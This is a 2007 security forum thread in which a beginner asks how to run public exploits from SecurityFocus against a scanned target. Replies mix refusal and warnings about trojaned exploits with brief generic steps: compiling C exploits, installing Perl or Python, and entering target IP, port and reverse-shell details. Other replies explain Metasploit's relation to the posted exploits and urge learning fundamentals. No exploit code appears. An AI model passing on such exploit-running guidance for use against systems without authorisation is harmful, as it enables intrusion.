If this is your first visit, be sure to
check out the FAQ by clicking the
link above. You may have to register
before you can post: click the register link above to proceed. To start viewing messages,
select the forum that you want to visit from the selection below.

after checking securityfocus for vulnerability...

after I scan a host and go to securityfocus and identify a given vulnerability..how do I use the exploit?....the come in form of .pl(perl), or .c(C) and even in .exe. How do you run this exploits agains the target machine?

I do not think that we are in the business of giving coaching sessions on how to run exploits against vulnerabilities.

Please bear in mind that this is a public forum and that anybody and their cat can read it. This includes every script kiddie in cyberspace

If anyone wishes to respond, please use the PM system and keep it private.

My personal view is that if someone doesn't know how to run an exploit against a target; they are trying to run before they have learned how to walk.

Last edited by nihil; September 13th, 2007 at 12:55 PM.

If you cannot do someone any good: don't do them any harm....
As long as you did this to one of these, the least of my little ones............you did it unto Me.
What profiteth a man if he gains the entire World at the expense of his immortal soul?

If it is a C exploit then you need to compile it - depending on your Operating System this is done in different ways. Linux has the GCC app that comes natively with most installations. With windows you will have to download one of your choice (googleing for 'free windows C compilers' gives you a huge list')

Perl, Python etc all need the respective libraries installing - going to the relevant home page for the language will invariably lead to a downloads section with the relevant libraries for your operating system.

Usually the exploit will have a small paragraph at the top explaining what it does and how to use it - if it doesn't, reading the source code will give you more of a hint of what information is needed (you don't need to understand the source code to read it - just look out for thing like 'enter the remote IP' etc)

Failing that, run the exploit (usually from the command line) and it will ask you to enter the relevant details which are usualy the remote IP address, remote port and the local IP and port (if a reverse shell is to be created.), other exploits such as those against web server may ask for directories etc.

Be careful however as there are quite a few malicious exploits out there that have been posted in the hope of the casual skiddie downloading it and running it without actually understanding what it is they are doing, that do not actually exploit a remote system and will in fact exploit your system.

It always pays to read through the source code - even if you know nothing about the language you will be able to spot references to your own system....

Be careful however as there are quite a few malicious exploits out there that have been posted in the hope of the casual skiddie downloading it and running it without actually understanding what it is they are doing, that do not actually exploit a remote system and will in fact exploit your system.

That is very true!

Also, you may be required to understand the operating system and application/service that you are trying to exploit, as well as the nature of the exploit.

IMO those "this is for educational and research purposes" disclaimers would not stand up in many courts.

Because of this, the author may well have posted a slightly incomplete or "neutered" version that will not work "out of the box".

That way they ensure that only people who know what they are doing can make it work, and that anyone who does so takes at least the major part, if not all of the responsibility for the consequences.

It is a much stronger defence to be able to say that what you published could not be used for malicious purposes as it stands.

If you cannot do someone any good: don't do them any harm....
As long as you did this to one of these, the least of my little ones............you did it unto Me.
What profiteth a man if he gains the entire World at the expense of his immortal soul?

well I'm doin it for learning proposes, against my vmware machines.....I guess that once you find an exploit in the security focus website and it will generate the code for you....you just copy and pasted into your metasploit directory and run it against your target machine, and of course in case of the .c file you'll have to compile it first....
also I notice that most of the exploits in the /pentest/framework3 or 2 have the .rb extension I'm assuming is for ruby....once I have selected a source code for a new exploit and compile should I drop it on the framework3 directory? and where b/c in that directory there are two files that seem to have exploits in them the /exploits and the /modules directory they both contain .rb files or it doesn't matter......any input appreciated

Metasploit is a framework.. It has nothing to do with the exploits posted at sec.focus. The exploits found at sec.focus aren't "generated" they are posted by the user community and they may or may not use the metasploit framework. Most of them are basically used "stand-alone".

If you don't know what to do with it then you need to read up.. As Nihil said, you're trying to run before you can walk.

Start by reading up on the various ways to exploit bugs, things like buffer overflows, format string exploits, sql/command injections etc. Once you know how the basics work you can move on to the more or less "real world" scenario you're trying now.

Oliver's Law:
Experience is something you don't get until just after you need it.